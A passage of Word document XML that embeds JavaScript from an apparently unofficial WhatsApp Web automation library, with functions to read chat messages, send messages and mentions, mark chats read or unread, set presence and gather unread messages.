          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (i === "remove")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messageObj = messages[i];</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message = WAPI.processMessageObj(messageObj, includeMe, includeNotifications)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (message)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                output.push(message);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window.WAPI.getAllMessageIdsInChat = function (id, includeMe, includeNotifications) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let output = [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const messages = chat.msgs._models;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(const i in messages) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ((i === "remove")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            || (!includeMe &amp;&amp; messages[i].isMe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            || (!includeNotifications &amp;&amp; messages[i].isNotification))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output.push(messages[i].id._serialized);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window.WAPI.getMessageById = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let result = false;</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let msg = window.Store.Msg.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (msg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            result = WAPI.processMessageObj(msg, true,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window.WAPI.sendMessageWithMentions = async function (ch, body) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = ch.id ? ch : Store.Chat.get(ch);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chatId = chat.id._serialized;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var msgIveSent = chat.msgs.filter(msg =&gt; msg.__x_isSentByMe)[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!msgIveSent) return chat.sendMessage(body);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(msgIveSent);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var mentionedJidList = body.match(/@(\d*)/g).filter(x =&gt; x.length &gt; 5).map(x =&gt; Store.Contact.get(x.replace("@", "") + "@c.us") ? new Store.WidFactory.createUserWid(x.replace("@", "")) : '') || undefined;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        to: new Store.WidFactory.createWid(chatId),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "chat",</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quotedMsg: null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mentionedJidList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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.addAndSendMsgToChat(chat, tempMsg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return newId._serialized;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window.WAPI.sendMessageReturnId = async function (ch, body) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = ch.id ? ch : Store.Chat.get(ch);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chatId = chat.id._serialized;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var msgIveSent = chat.msgs.filter(msg =&gt; msg.__x_isSentByMe)[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!msgIveSent) return chat.sendMessage(body);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(msgIveSent);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        id: newId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        local: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        self: "out",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        t: parseInt(new Date().getTime() / 1000),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        to: new Store.WidFactory.createWid(chatId),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        isNewMsg: !0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        type: "chat",</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quotedMsg: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Object.assign(tempMsg, extend);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.addAndSendMsgToChat(chat, tempMsg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return newId._serialized;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window.WAPI.sendMessage = async function (id, message) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (id === 'status@broadcast') return 'Not able to send message to broadcast';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let chat = WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if ((!chat &amp;&amp; !id.includes('g') || chat.msgs.models.length == 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        var contact = WAPI.getContact(id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!contact || !contact.isMyContact) return 'Not a contact';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await Store.Chat.find(Store.Contact.get(id).id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        chat = WAPI.getChat(id);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(chat !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // return WAPI.sendMessageReturnId(chat,message).then(id=&gt;{return id})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return await chat.sendMessage(message).then(_ =&gt; chat.lastReceivedKey._serialized);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window.WAPI.sendSeen = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!id) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = window.WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chat !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await Store.ReadSeen.sendSeen(chat, false);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window.WAPI.markAsUnread = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = window.WAPI.getChat(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chat !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await Store.ReadSeen.markUnread(chat, true);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window.isChatMessage = function (message) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (message.isSentByMe)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(message.isNotification)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(!message.isUserCreatedType)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window.WAPI.setPresence = function (available) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (available) Store._Presence.setPresenceAvailable();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else Store._Presence.setPresenceUnavailable();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window.WAPI.getUnreadMessages = function (includeMe, includeNotifications, use_unread_count) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const chats = window.Store.Chat.models;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let 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chat in chats) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (isNaN(chat))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messageGroupObj = chats[chat];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        let messageGroup = WAPI._serializeChatObj(messageGroupObj);</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messageGroup.messages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const messages = messageGroupObj.msgs._models;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        for (let i = messages.length - 1; i &gt;= 0; i--) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let messageObj = messages[i];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (typeof (messageObj.isNewMsg) != "boolean" || messageObj.isNewMsg === false) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                continue;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messageObj.isNewMsg = false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                let message = WAPI.processMessageObj(messageObj, includeMe, includeNotifications);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (message) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    messageGroup.messages.push(message);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(messageGroup.messages.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            output.push(messageGroup);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else { // no messages with isNewMsg true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (use_unread_count) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                let n = messageGroupObj.unreadCount; // will use unreadCount attribute to fetch last n messages from sender</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                for (let i = messages.length - 1; i &gt;= 0; i--) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
